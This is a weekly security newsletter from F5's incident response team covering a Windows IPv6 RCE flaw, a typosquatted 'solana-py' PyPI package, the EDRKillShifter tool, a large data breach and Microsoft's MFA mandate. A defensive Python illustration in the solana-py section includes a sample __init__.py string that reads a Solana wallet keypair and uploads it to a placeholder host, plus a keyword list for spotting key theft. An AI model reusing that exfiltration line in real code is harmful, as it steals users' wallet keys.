Windows Critical RCE Vulnerability, Malicious Solana-py, and EDRKillShifter

Notable security news for the week of Aug 11th-17th 2024, brought to you by the F5 Security Incident Response Team. This week your editor is Dharminder. In this edition, I have security news about a critical TCP/IP remote code execution (RCE) vulnerability in all Microsoft Windows systems using IPv6, a malicious package “solana-py” on the Python Package Index (PyPI), EDRKillShifter, a tool to disable endpoint detection and response (EDR) software on compromised systems, 2.7 billion data records stolen from National Public Data, and Microsoft’s announcement on enabling MFA by October 2024.

We in F5 SIRT invest a lot of time to understand the frequently changing behaviour of bad actors. Bad actors are a threat to your business, your reputation, your livelihood. That’s why we take the security of your business seriously. When you’re under attack, we’ll work quickly to effectively mitigate attacks and vulnerabilities, and get you back up and running. So next time you are in a security emergency, please contact F5 SIRT.

Ok, let's get started and find the details of the security news.


Microsoft Windows TCP/IP Critical RCE Vulnerability

Microsoft has issued an urgent warning to patch a critical TCP/IP remote code execution (RCE) vulnerability, tracked as CVE-2024-38063, that affects all Windows systems using IPv6, which is enabled by default. Discovered by XiaoWei from Kunlun Lab, the vulnerability stems from an integer underflow issue that can lead to buffer overflows, allowing attackers to execute arbitrary code on vulnerable systems. Microsoft labeled the exploit as "more likely" to be used in attacks, making it a high-priority threat. The vulnerability is particularly dangerous because it can be exploited remotely by sending specially crafted IPv6 packets repeatedly. Although disabling IPv6 can mitigate the risk, Microsoft cautions that doing so may cause system disruptions, as IPv6 is integral to modern Windows versions. This flaw is comparable to previous severe IPv6 vulnerabilities patched by Microsoft, underscoring the ongoing security risks associated with IPv6. Users are strongly advised to apply the latest security updates immediately to protect their systems.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063


Malicious Package - solana-py on the Python Package Index (PyPI)

Cybersecurity researchers have identified a malicious package on the Python Package Index (PyPI) called "solana-py," which falsely claims to be associated with the Solana blockchain platform. The legitimate Solana Python API library is named "solana" on PyPI and "solana-py" on GitHub. Exploiting this naming discrepancy, the threat actor released a fraudulent "solana-py" package on PyPI, designed to steal Solana blockchain wallet keys. The rogue package, which had 1,122 downloads before its removal, mirrored the real package's code but included additional malicious code in the __init__.py script to exfiltrate sensitive data to a domain controlled by the attacker. This package posed a significant supply chain risk, as even legitimate libraries like "solders" have referenced it in their documentation, potentially spreading the attack further. This incident highlights the critical need for developers to carefully verify the authenticity of software packages to protect against similar supply chain attacks.
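As an added illustration (not code from the article or from the Solana project), here are two cheap checks a defender could run before installing a package: flagging a requested name that collapses to a trusted name once a "-py" style suffix or "python-" style prefix is stripped, and statically flagging an __init__.py that imports a network module while referencing wallet-like file paths. The trusted list and both sample __init__.py bodies are constructed for the example; the placeholder URL is not a real collector.

```python
import ast

# Constructed trusted list: PyPI names we expect to install, with a note on the
# naming discrepancy the article describes (PyPI "solana" vs GitHub "solana-py").
TRUSTED = {"solana": "Solana Python client: PyPI 'solana', GitHub repo 'solana-py'"}

# Import-time use of these modules is rare in legitimate client libraries.
NETWORK_MODULES = {"urllib", "requests", "socket", "http"}
# Substrings that suggest the code is reaching for key material.
SENSITIVE_HINTS = ("wallet", "keypair", "id.json", ".ssh", "private")


def name_collision(requested: str, trusted=TRUSTED):
    """Return the trusted name a requested package name collides with, else None."""
    name = requested.lower().replace("_", "-")
    for suffix in ("-py", "-python"):
        if name.endswith(suffix):
            name = name[: -len(suffix)]
    for prefix in ("py-", "python-"):
        if name.startswith(prefix):
            name = name[len(prefix):]
    return name if name in trusted and requested.lower() != name else None


def audit_init(source: str) -> dict:
    """Statically inspect an __init__.py body and return review findings."""
    findings = {"network_imports": set(), "sensitive_strings": set()}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings["network_imports"].add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                findings["network_imports"].add(node.module)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value.lower() for h in SENSITIVE_HINTS):
                findings["sensitive_strings"].add(node.value)
    # Both signals together are what a reviewer should look at first.
    findings["suspicious"] = bool(findings["network_imports"] and findings["sensitive_strings"])
    return findings


# Constructed samples: a plain re-export module and one with an import-time upload.
BENIGN_INIT = "from .rpc.api import Client\n__all__ = ['Client']\n"
SUSPICIOUS_INIT = (
    "import os\nimport urllib.request\nfrom .rpc.api import Client\n"
    "_p = os.path.expanduser('~/.config/solana/id.json')\n"
    "if os.path.exists(_p):\n"
    "    urllib.request.urlopen('https://placeholder.invalid/', data=open(_p, 'rb').read())\n"
)
```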

https://thehackernews.com/2024/08/rogue-pypi-library-solana-users-steals.html

https://www.rewterz.com/threat-advisory/malicious-pypi-library-solana-steals-blockchain-wallet-keys-from-users


EDRKillShifter - Tool to Disable EDR

Sophos analysts discovered a new tool named EDRKillShifter, deployed by a cybercriminal group in a failed attempt to execute a ransomware attack using RansomHub. EDRKillShifter is a "bring your own vulnerable driver" (BYOVD) tool. It acts as a loader that delivers a legitimate but vulnerable driver, which is then exploited to gain elevated privileges and disable security defenses. This discovery underscores a rising trend in sophisticated malware targeting EDR systems, as seen in other tools like AuKill. To mitigate such threats, Sophos advises enabling tamper protection, maintaining strict separation of user and admin privileges, and regularly updating systems to prevent the abuse of vulnerable drivers.

https://news.sophos.com/en-us/2024/08/14/edr-kill-shifter/

https://thehackernews.com/2024/08/ransomhub-group-deploys-new-edr-killing.html


2.7 Billion Data Records Stolen

A significant data breach has exposed 2.7 billion records of personal information for U.S. residents, including names, social security numbers, and addresses. The data was reportedly stolen from National Public Data, a company that gathers and sells personal information for background checks and investigations. Initially, a threat actor named "USDoD" claimed to have stolen 2.9 billion records and attempted to sell them for $3.5 million. However, the most extensive version of the stolen data was later leaked for free on a hacking forum by a different threat actor known as "Fenice," who claimed that the breach was actually carried out by another actor named "SXUL." The leaked data, which consists of unencrypted information, includes multiple records per person, making it inaccurate in some cases. This breach has sparked multiple class action lawsuits against National Public Data for failing to protect sensitive information. Individuals affected by the breach are advised to monitor their credit reports for fraudulent activity and be cautious of phishing attempts, as previously leaked samples also included phone numbers and email addresses.

https://www.bleepingcomputer.com/news/security/hackers-leak-27-billion-data-records-with-social-security-numbers/

https://www.foxnews.com/tech/2-7-billion-records-leaked-massive-us-data-breach

https://www.cyberdefensemagazine.com/massive-data-breach-at-national-public-data-exposes-2-7-billion-records/


Microsoft’s Announcement - Enable MFA by October 15, 2024

Microsoft has urged Entra global admins to enable multi-factor authentication (MFA) by October 15, 2024, as part of the Secure Future Initiative (SFI). This mandate is designed to protect Azure accounts from phishing and hijacking by requiring MFA for all Azure sign-ins. While admins can delay enforcement until April 15, 2025, Microsoft warns that doing so increases security risks. The company has sent notifications to admins, emphasizing the need for immediate MFA setup to secure cloud resources. Starting in October, MFA will be mandatory for accessing admin portals like Microsoft Entra admin center, Intune admin center, and the Azure portal. By early 2025, MFA enforcement will extend to Azure PowerShell, Azure CLI, Azure mobile apps, and Infrastructure as Code (IaC) tools. Microsoft highlights that MFA significantly enhances account security, with studies showing it reduces account compromise risk by over 98%.

https://azure.microsoft.com/en-us/updates/v2/Enable-multifactor-authentication-for-your-tenant-by-15-October-2024

https://www.bleepingcomputer.com/news/microsoft/microsoft-enable-mfa-or-lose-access-to-admin-portals-in-october/

Published Aug 23, 2024
Version 1.0